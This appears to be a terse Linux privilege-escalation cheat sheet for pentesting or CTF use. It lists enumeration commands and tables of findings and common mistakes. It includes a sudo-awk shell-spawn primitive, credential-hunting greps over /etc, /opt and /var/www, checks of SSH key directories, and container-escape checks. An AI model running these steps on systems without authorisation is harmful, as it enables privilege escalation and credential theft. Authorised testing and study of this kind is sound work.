id uname -a cat /etc/os-release sudo -l find / -perm -4000 -type f 2>/dev/null getcap -r / 2>/dev/null ss -lntup ps auxf crontab -l ls -al /etc/cron*
| Finding | Why it matters |
|---|---|
| sudo rule | NOPASSWD or writable script target |
| SUID binary | GTFOBins or custom vuln |
| capabilities | cap_setuid, cap_sys_admin, cap_dac_override |
| cron / timer | writable script or writable PATH element |
| service creds | env vars, config files, backups |
# sudo sudo -l sudo awk 'BEGIN {system("/bin/sh")}' # SUID find / -perm -4000 -type f 2>/dev/null # check GTFOBins for exact primitive # capabilities getcap -r / 2>/dev/null
echo $PATH find / -writable -type d 2>/dev/null ls -al /etc/cron* systemctl list-timers --all # writable script executed by root? grep -R '/tmp\|/dev/shm\|home' /etc/systemd /etc/cron* 2>/dev/null
grep -Rni 'pass\|token\|secret\|key' /etc /opt /var/www 2>/dev/null | head find / -name '*.bak' -o -name '*.old' -o -name '*.swp' 2>/dev/null ls -al ~/.ssh /root/.ssh 2>/dev/null env
cat /proc/1/cgroup mount ip a docker ps 2>/dev/null # if inside container, check mounted docker socket / host fs
linpeas.sh lse.sh pspy64 # still verify manually before exploiting
| Mistake | Note |
|---|---|
| kernel exploit first | often unnecessary and noisy |
| copying GTFOBins blindly | version / shell path may differ |
| ignoring timers | systemd timers replace cron a lot |
| not checking group memberships | docker, lxd, adm can be enough |
| forgetting capabilities | less obvious than SUID |